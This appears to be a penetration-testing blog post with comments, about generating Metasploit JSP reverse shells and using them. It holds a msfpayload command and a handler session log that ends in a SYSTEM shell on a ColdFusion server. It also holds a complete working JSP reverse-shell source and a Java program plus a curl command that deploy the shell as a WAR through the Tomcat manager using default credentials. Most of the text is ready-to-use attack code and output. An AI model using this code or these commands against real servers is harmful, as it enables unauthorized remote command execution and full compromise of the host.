Metasploit JSP Shells

Stephen Fewer has pushed up a JSP reverse shell and a JSP bind shell.

http://dev.metasploit.com/redmine/projects/framework/repository/show/modules/payloads/singles/java

I'm not sure of all the ways to use them, but the easiest is to output the payload as raw (R) and upload the resulting .jsp to any server that will execute it; for an example of using one inside an exploit module, check out the Adobe RoboHelp auth bypass exploit.

http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/http/adobe_robohelper_authbypass.rb

yomomma@c0:~/pentest/msf3.3dev$ ./msfpayload java/jsp_shell_reverse_tcp LHOST=192.168.10.1 R > blah.jsp

From there, start a multi/handler for the same payload, browse to webpath/blah.jsp, and the JSP connects back to your handler. The shell runs as whatever account the servlet container runs as (in the session below that is ColdFusion 8 running as SYSTEM). Note the SHELL option in the options list: it defaults to cmd.exe and is baked into the JSP at generation time, so for a Unix container pass SHELL=/bin/sh to msfpayload rather than setting it on the handler.

yomomma@c0:~/pentest/msf3.3dev$ ./msfconsole
                =[ msf v3.3-dev [core:3.3 api:1.0]
+ -- --=[ 432 exploits - 261 payloads
+ -- --=[ 21 encoders - 8 nops
       =[ 222 aux


msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD java/jsp_shell_reverse_tcp
PAYLOAD => java/jsp_shell_reverse_tcp
msf exploit(handler) > set LHOST 192.168.10.1
LHOST => 192.168.10.1

msf exploit(handler) > info

       Name: Generic Payload Handler
    Version: 6558
   Platform: Windows, Linux, Solaris, Unix, OSX, BSD, PHP
 Privileged: No
    License: Metasploit Framework License (BSD)

Provided by:
  hdm

Available targets:
  Id  Name
  --  ----
  0   Wildcard Target

Payload information:
  Space: 100000
  Avoid: 0 characters

Description:
  This module is a stub that provides all of the features of the
  Metasploit payload system to exploits that have been launched
  outside of the framework.

msf exploit(handler) > show options

Module options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (java/jsp_shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.10.1     yes       The local address
   LPORT  4444             yes       The local port
   SHELL  cmd.exe          yes       The system shell to use.


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) > exploit

[*] Starting the payload handler...
[*] Started reverse handler
[*] Command shell session 1 opened (192.168.10.1:4444 -> 192.168.10.2:42957)

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\ColdFusion8\runtime\bin> whoami
whoami
nt authority\system

C:\ColdFusion8\runtime\bin>exit
exit
[*] Command shell session 1 closed.
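For anyone who wants to see what actually gets uploaded, here is a minimal JSP reverse shell added as an illustration. It is not from the original post and not the file msfpayload generates (Stephen's template is in the repo linked above); it just does the same job with the same three knobs (LHOST, LPORT, SHELL), using the addresses from the session above as assumed values. It also shows why SHELL has to be /bin/sh on a Unix container and why the browser request hangs for as long as you hold the shell.

```java
<%@ page import="java.io.*,java.net.*" %>
<%!
    // Copy bytes from in to out until EOF on its own thread, then close out.
    // Closing the shell's stdin on EOF is what makes cmd.exe or sh exit when
    // the handler side goes away.
    static void pump(final InputStream in, final OutputStream out) {
        Thread t = new Thread(new Runnable() {
            public void run() {
                byte[] buf = new byte[4096];
                int n;
                try {
                    while ((n = in.read(buf)) != -1) {
                        out.write(buf, 0, n);
                        out.flush();
                    }
                } catch (IOException e) {
                    // one end closed; nothing more to copy
                } finally {
                    try { out.close(); } catch (IOException e) { }
                }
            }
        });
        t.setDaemon(true);
        t.start();
    }
%>
<%
    // Assumed values matching the walkthrough; msfpayload bakes LHOST,
    // LPORT and SHELL into the generated file the same way.
    String lhost = "192.168.10.1";
    int lport = 4444;
    String shell = "cmd.exe";   // SHELL=/bin/sh for a Unix servlet container

    Socket sock = new Socket(lhost, lport);
    // stderr merged into stdout so a single pump carries everything back
    Process proc = new ProcessBuilder(shell).redirectErrorStream(true).start();

    pump(sock.getInputStream(), proc.getOutputStream());   // handler -> shell stdin
    pump(proc.getInputStream(), sock.getOutputStream());   // shell output -> handler

    // The request thread parks here until the shell exits ("exit" in the
    // session above), which is why the browser keeps spinning while the
    // session is up. Everything runs as the container's account.
    try {
        proc.waitFor();
    } catch (InterruptedException e) {
        proc.destroy();
    }
    sock.close();
%>
```

If the handler disconnects first, the socket-to-stdin pump hits EOF and closes the shell's stdin, the shell exits on its own, waitFor() returns and the socket is torn down, so you do not leave a stray cmd.exe behind on the target.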


Comments

Tomcat

If you own the management page of a Tomcat server (probably any J2EE server), you could also deploy it as a WAR file.

jar -cf blah.war blah.jsp
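Added example, not from the comment above or from Metasploit: a small Java program that does what the jar command plus a manager upload amount to, building a WAR around blah.jsp and PUTting it to the Tomcat manager. Host, credentials and context path are assumed values. Tomcat 5.5/6 expose the deploy command at /manager/deploy; Tomcat 7 and later moved the text interface to /manager/text/deploy and require the manager-script role for it.

```java
import java.io.*;
import java.net.*;
import java.nio.file.*;
import java.util.Base64;
import java.util.jar.*;

// Added example: build a WAR around blah.jsp and push it to the Tomcat manager.
// Host, credentials and context path below are assumptions for the example.
public class DeployJspWar {

    // A WAR is just a zip; a file at its root is served at /<context>/<file>.
    // Tomcat falls back to its global conf/web.xml when WEB-INF/web.xml is
    // absent, which is why the one-file "jar -cf" WAR from the comment works.
    static byte[] buildWar(String jspName, byte[] jspBody) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        JarOutputStream jar = new JarOutputStream(bos);
        jar.putNextEntry(new JarEntry(jspName));
        jar.write(jspBody);
        jar.closeEntry();
        jar.close();
        return bos.toByteArray();
    }

    // Tomcat 5.5/6: PUT http://host:8080/manager/deploy?path=/blah
    // Tomcat 7+:    PUT http://host:8080/manager/text/deploy?path=/blah
    //               (the account needs the manager-script role)
    // Returns the status code plus the manager's one-line reply, e.g.
    // "OK - Deployed application at context path /blah" or "FAIL - ...".
    static String deploy(String managerBase, String contextPath,
                         String user, String pass, byte[] war) throws IOException {
        URL url = new URL(managerBase + "/deploy?path=" + contextPath);
        HttpURLConnection conn = (HttpURLConnection) url.openConnection();
        conn.setRequestMethod("PUT");
        conn.setDoOutput(true);
        String creds = Base64.getEncoder()
                .encodeToString((user + ":" + pass).getBytes("UTF-8"));
        conn.setRequestProperty("Authorization", "Basic " + creds);
        conn.setRequestProperty("Content-Type", "application/octet-stream");
        conn.setFixedLengthStreamingMode(war.length);
        try (OutputStream out = conn.getOutputStream()) {
            out.write(war);
        }
        int status = conn.getResponseCode();
        InputStream body = status < 400 ? conn.getInputStream() : conn.getErrorStream();
        if (body == null) {
            return Integer.toString(status);
        }
        BufferedReader r = new BufferedReader(new InputStreamReader(body, "UTF-8"));
        String line = r.readLine();
        r.close();
        return status + " " + line;
    }

    public static void main(String[] args) throws IOException {
        byte[] jsp = Files.readAllBytes(Paths.get("blah.jsp"));   // output of msfpayload ... R
        byte[] war = buildWar("blah.jsp", jsp);
        // Start the multi/handler first; the JSP connects back as soon as it is hit.
        System.out.println(deploy("http://192.168.10.2:8080/manager/text",   // assumed target
                                  "/blah", "tomcat", "tomcat", war));
        // Then trigger it by requesting http://192.168.10.2:8080/blah/blah.jsp
    }
}
```

The same upload from the command line is `curl -u tomcat:tomcat --upload-file blah.war 'http://192.168.10.2:8080/manager/text/deploy?path=/blah'` (drop the /text for Tomcat 5.5/6); the shell is then reachable at /blah/blah.jsp. Undeploy through the same interface when you are done, since the WAR stays in webapps/ otherwise.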